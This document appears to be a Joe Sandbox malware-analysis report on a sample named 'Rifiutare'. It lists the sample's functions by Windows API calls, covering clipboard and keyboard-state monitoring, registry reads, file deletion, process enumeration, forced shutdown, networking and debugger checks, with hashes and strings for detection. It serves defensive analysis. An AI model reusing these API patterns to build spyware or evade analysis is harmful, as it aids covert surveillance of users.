Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 55d520cef1becff7ad898493e6a49814e4670314974201de665895ea158b9fc9
Instruction ID: acd37de7799a08e3effcbdee9be1692f65c434a917f091ab2dcd3c271b582791
Opcode Fuzzy Hash: 55d520cef1becff7ad898493e6a49814e4670314974201de665895ea158b9fc9
Instruction Fuzzy Hash: 3A61E2302043029FD710EF60D889F2EB7A4EF89308F14496DF456872A1DB31DE46DB62

Function 00CA4635 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CA4657
_wcslen.LIBCMT ref: 00CA4684
CreateDirectoryW.KERNEL32(?,00000000), ref: 00CA46B4
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CA46D5
RemoveDirectoryW.KERNEL32(?), ref: 00CA46E5
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CA476C
CloseHandle.KERNEL32(00000000), ref: 00CA4777
CloseHandle.KERNEL32(00000000), ref: 00CA4782

Strings

:, xrefs: 00CA4699
\, xrefs: 00CA468E
\??\%s, xrefs: 00CA4672

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 20ba7acbbcec683e06aba85ce6877becf78b4f5507f3b74473979415ee9ca675
Instruction ID: 2996c24446f09482ec419b529e583b4b496e58c1479c315e1df82da0aceeeefc
Opcode Fuzzy Hash: 20ba7acbbcec683e06aba85ce6877becf78b4f5507f3b74473979415ee9ca675
Instruction Fuzzy Hash: 9A31B4B550010AABDB219FA0DC49FEF37BDEF8A715F1041B9F519D2060EBB497858B24

Function 00CBC5C4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBD11B: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CBBE2E,?,?), ref: 00CBD138
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD174
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD1E2
Part of subcall function 00CBD11B: _wcslen.LIBCMT ref: 00CBD218

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CBC6BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00CBC729
RegCloseKey.ADVAPI32(00000000), ref: 00CBC74D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CBC7AC
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CBC867
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CBC8D4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CBC969
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00CBC9BA
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CBCA63
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CBCB02
RegCloseKey.ADVAPI32(00000000), ref: 00CBCB0F

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 64cdb2b1bb5576e36162797678bf4cb6eeae235fee7432c2b3a9ac8154feba2b
Instruction ID: 2a3736ae896b2f9e870d625ffd52042bb8b5372409349d57dc3f9db6dbab3f9c
Opcode Fuzzy Hash: 64cdb2b1bb5576e36162797678bf4cb6eeae235fee7432c2b3a9ac8154feba2b
Instruction Fuzzy Hash: FA027D71604200AFD714CF28C8D5E6ABBE4EF49314F1884ADF85ADB2A2DB31ED42DB51

Function 00C9A492 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C9A4BA
GetAsyncKeyState.USER32(000000A0), ref: 00C9A53B
GetKeyState.USER32(000000A0), ref: 00C9A556
GetAsyncKeyState.USER32(000000A1), ref: 00C9A570
GetKeyState.USER32(000000A1), ref: 00C9A585
GetAsyncKeyState.USER32(00000011), ref: 00C9A59D
GetKeyState.USER32(00000011), ref: 00C9A5AF
GetAsyncKeyState.USER32(00000012), ref: 00C9A5C7
GetKeyState.USER32(00000012), ref: 00C9A5D9
GetAsyncKeyState.USER32(0000005B), ref: 00C9A5F1
GetKeyState.USER32(0000005B), ref: 00C9A603

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7d18edfb5996e9a1771d271d4227ce355c4c6e3e16f6aa3fea8d2ef302618b8e
Instruction ID: 269d87737f02f6fbe6992ea454444557f6cf0fe312e31582a9b9b3158fce8d82
Opcode Fuzzy Hash: 7d18edfb5996e9a1771d271d4227ce355c4c6e3e16f6aa3fea8d2ef302618b8e
Instruction Fuzzy Hash: 9C41A6A0604FC96DFF319A64C80C7B5BEA06B11304F098459D5E64A1C2EBE49FC8C7E3

Function 00CA72A6 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 286timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00CA72D2
FindClose.KERNEL32(00000000), ref: 00CA7323
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CA734F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CA7366

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

FileTimeToSystemTime.KERNEL32(?,?), ref: 00CA738D

Strings

%02d, xrefs: 00CA7461, 00CA746B, 00CA74B9, 00CA7508, 00CA7557, 00CA75A6
%4d%02d%02d%02d%02d%02d, xrefs: 00CA73D3
%4d, xrefs: 00CA7413

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 409396820-2428617273
Opcode ID: 1c6b71b66428ee4b77576d66503d4ff5d61c7cfca8d377ce772611000f3aee1a
Instruction ID: eb3b393063d12304cd5756a196221c151b446f38e509bd644c7df0825961366c
Opcode Fuzzy Hash: 1c6b71b66428ee4b77576d66503d4ff5d61c7cfca8d377ce772611000f3aee1a
Instruction Fuzzy Hash: 5DA16FB1418241AFC714EB64CC85EAFB3ECBF85304F40491DF99586192EB34DA48DB62

Function 00C9D7CC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00C350F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C35035,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C35117

Part of subcall function 00C9E8F5: CompareStringW.KERNEL32(00000400,00000001,?,?,00C9D818,?,?,?,?,?,?,00000000), ref: 00C9E947

Part of subcall function 00C9E970: GetFileAttributesW.KERNEL32(?,00C9D6EB), ref: 00C9E971

FindFirstFileW.KERNEL32(?,?), ref: 00C9D878
CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?,?,?), ref: 00C9D92D
DeleteFileW.KERNEL32(?), ref: 00C9D93F
MoveFileW.KERNEL32(?,?), ref: 00C9D952
DeleteFileW.KERNEL32(?,?,?,?), ref: 00C9D96F
FindNextFileW.KERNEL32(00000000,00000010), ref: 00C9D999

Part of subcall function 00C9D9FE: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C9D97E,?,?), ref: 00C9DA14

FindClose.KERNEL32(00000000,?,?,?), ref: 00C9D9B5
FindClose.KERNEL32(00000000), ref: 00C9D9C6

Strings

\*.*, xrefs: 00C9D823, 00C9D82C, 00C9D841

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: File$Find$CloseCompareDeleteString$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 597992297-1173974218
Opcode ID: a289b5adc5492de7bb94a8509dfdb8d9eb2a226a0967778cb119f7f1df231e66
Instruction ID: 8cb0384eb658e445474b45604d4c4caecdaa1ee4e069296a6f4e6f4682e0e2a0
Opcode Fuzzy Hash: a289b5adc5492de7bb94a8509dfdb8d9eb2a226a0967778cb119f7f1df231e66
Instruction Fuzzy Hash: E5619D3180014DAECF15FBA0DE96AEEB7B5AF15304F204165E452771A2EF316F09EB61

Function 00CAF5B0 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00CAF5D7
EmptyClipboard.USER32 ref: 00CAF5DD
GlobalAlloc.KERNEL32(00000002,?), ref: 00CAF5F2
CloseClipboard.USER32 ref: 00CAF6E9

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 3eb8c47b296f812b3f2694062ed6adbac99964f5bd513018245d741f2058900c
Instruction ID: a9c173b07f0345df875cc5361403f153bbb776cbbdc5bf72b7c338981b6951f6
Opcode Fuzzy Hash: 3eb8c47b296f812b3f2694062ed6adbac99964f5bd513018245d741f2058900c
Instruction Fuzzy Hash: 21418D35604612AFD720CF65E889F19BBA0EF45319F14C4ADF46A8B672CB35ED42CB90

Function 00C9F0CD Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00C91F3D: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C91F87
Part of subcall function 00C91F3D: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C91FB4
Part of subcall function 00C91F3D: GetLastError.KERNEL32 ref: 00C91FC4

ExitWindowsEx.USER32(?,00000000), ref: 00C9F109

Strings

@, xrefs: 00C9F0FC
SeShutdownPrivilege, xrefs: 00C9F0D9
, xrefs: 00C9F0F7
, xrefs: 00C9F133

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 317ecfed8ccb31e82b3690f78cf32b5afdd35321e4510ef6b7b2af3830ddccd9
Instruction ID: a0ccc6962a9802c76febfac4d773446915265637065b710882225fd38ddd74f5
Opcode Fuzzy Hash: 317ecfed8ccb31e82b3690f78cf32b5afdd35321e4510ef6b7b2af3830ddccd9
Instruction Fuzzy Hash: 52018672710215ABEF2866BCEC9EFBE725C9B04354F150439FD53E21D2DAA05E429290

Function 00C920EE Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C920F9
UnloadUserProfile.USERENV(?,?), ref: 00C92105
CloseHandle.KERNEL32(?), ref: 00C9210E
CloseHandle.KERNEL32(?), ref: 00C92116
GetProcessHeap.KERNEL32(00000000,?), ref: 00C9211F
HeapFree.KERNEL32(00000000), ref: 00C92126

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: a1d01319ac58ad5472a409440dab1e2563b1376bde98b351d1d0ac46f47e60d2
Instruction ID: 10556f2dbe39f4ce5422cc29de65c53405a147452c065b6209ef5b84993b0435
Opcode Fuzzy Hash: a1d01319ac58ad5472a409440dab1e2563b1376bde98b351d1d0ac46f47e60d2
Instruction Fuzzy Hash: 33E0C2B6004505BBDB011BA2EC0CF0EBF39FB49322B184234F22682070CB329422DB50

Function 00CAA32C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00CAA379
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CAA48C

Part of subcall function 00CA418B: GetInputState.USER32 ref: 00CA41E2
Part of subcall function 00CA418B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CA427D

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00CAA3A9
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00CAA476

Strings

*.*, xrefs: 00CAA35E

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 2b39a631159a21a233e7eb93538bc31a07461328268b15f3b3108bb8eb8a42ae
Instruction ID: 9a628cb7afd919ab8d10dee26f4f5a5e0954b3323a4c4334e61743c02babfe57
Opcode Fuzzy Hash: 2b39a631159a21a233e7eb93538bc31a07461328268b15f3b3108bb8eb8a42ae
Instruction Fuzzy Hash: 4741717190420A9FCF15DFA4C859BEEBBB4EF0A314F104166F815A31A1DB709F84DB62

Function 00C321FD Relevance: 7.8, APIs: 5, Instructions: 309COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00C3228E
GetSysColor.USER32(0000000F), ref: 00C32363
SetBkColor.GDI32(?,00000000), ref: 00C32376

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 7d2702c5c5520ebdf674d6db007da58e412455421c736af0d847d098e4ad580b
Instruction ID: 5fd0132d10535ad8794350bf1586f248779f46c52cfc9e536e5ac0d8b0e1c53b
Opcode Fuzzy Hash: 7d2702c5c5520ebdf674d6db007da58e412455421c736af0d847d098e4ad580b
Instruction Fuzzy Hash: 7B8126B0224484BEEA39BA3E8C4CF7F195DDB46300F154119F522C65B2CE2A9F02F676

Function 00CBADEE Relevance: 7.7, APIs: 5, Instructions: 181processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00CBAE1E
Process32FirstW.KERNEL32(00000000,?), ref: 00CBAE2C

Part of subcall function 00C3C110: _wcslen.LIBCMT ref: 00C3C11A

CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00CBAEB0
Process32NextW.KERNEL32(00000000,?), ref: 00CBAF18
CloseHandle.KERNEL32(00000000), ref: 00CBAF2A

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: bf901c5fc99f2ecf9c3fb8f419fc8611fb01c5f364aa55b6aab00b6867347429
Instruction ID: 429829f77cf5f30b43e7dc63785b2853781d04324c6d49d27c772229a8889a59
Opcode Fuzzy Hash: bf901c5fc99f2ecf9c3fb8f419fc8611fb01c5f364aa55b6aab00b6867347429
Instruction Fuzzy Hash: C3613AB1508341AFC710EF24D886AAFBBE8FF89754F00492DF59597291EB70E904DB92

Function 00CB204C Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB3821: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00CB384D
Part of subcall function 00CB3821: _wcslen.LIBCMT ref: 00CB386E

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00CB20A3
WSAGetLastError.WSOCK32 ref: 00CB20CA
bind.WSOCK32(00000000,?,00000010), ref: 00CB2121
WSAGetLastError.WSOCK32 ref: 00CB212C
closesocket.WSOCK32(00000000), ref: 00CB215B

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 1c64737282251c452e4fcebf14eadc083703570c95125801e16408f0770c54ec
Instruction ID: 5ef14c5faebd913c9372864e948363ed50144b9aaf0974e31f1db376bd29b5a0
Opcode Fuzzy Hash: 1c64737282251c452e4fcebf14eadc083703570c95125801e16408f0770c54ec
Instruction Fuzzy Hash: 8451C171A00210AFD721AF24D886FAE77A5AB05714F088098F956AF3D3CB71AD41DBE1

Function 00CC231B Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00CC239A
IsWindowEnabled.USER32 ref: 00CC23A8
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00CC23B5
IsIconic.USER32 ref: 00CC23C3
IsZoomed.USER32 ref: 00CC23D1

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: ccae822b8ec99301accdd5b359e4f167f61f6986265e95b4f28c459171e4dd0c
Instruction ID: f866fab83243aa3eb50d4e525eed1915627f7a82ef41e2d7c665607d946aa684
Opcode Fuzzy Hash: ccae822b8ec99301accdd5b359e4f167f61f6986265e95b4f28c459171e4dd0c
Instruction Fuzzy Hash: 7C21B5317002809FD7119F26D844F5E7B9DBF85315F1C806CE85A8B261DB79DD42CBA0

Function 00CAD672 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00CAD6B7
GetLastError.KERNEL32(?,00000000), ref: 00CAD718
SetEvent.KERNEL32(?,?,00000000), ref: 00CAD72C

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 6241bb0b627fa36d6062393bf847f391d7dee86e8e48a977e766139d049d223f
Instruction ID: d16e9632d09f22fb9d017af39aeee7bb58a90ec05c3461a4ca8750b60bad7a79
Opcode Fuzzy Hash: 6241bb0b627fa36d6062393bf847f391d7dee86e8e48a977e766139d049d223f
Instruction Fuzzy Hash: B921CF75500706AFEB24DF65C888BABB7F8EF41308F10482AE657D2551D770EE45DB60

Function 00C629B2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00C62AAA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C62AB4
UnhandledExceptionFilter.KERNEL32(?), ref: 00C62AC1

Memory Dump Source

Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2b5e25f0f92ff97c3b3675941da10a56c947a81e2417da2986deca57b2c2fa2e
Instruction ID: 1892071ee6d234426590bebf33c37fdfd41994b689ba1300d8140c45f7d2635c
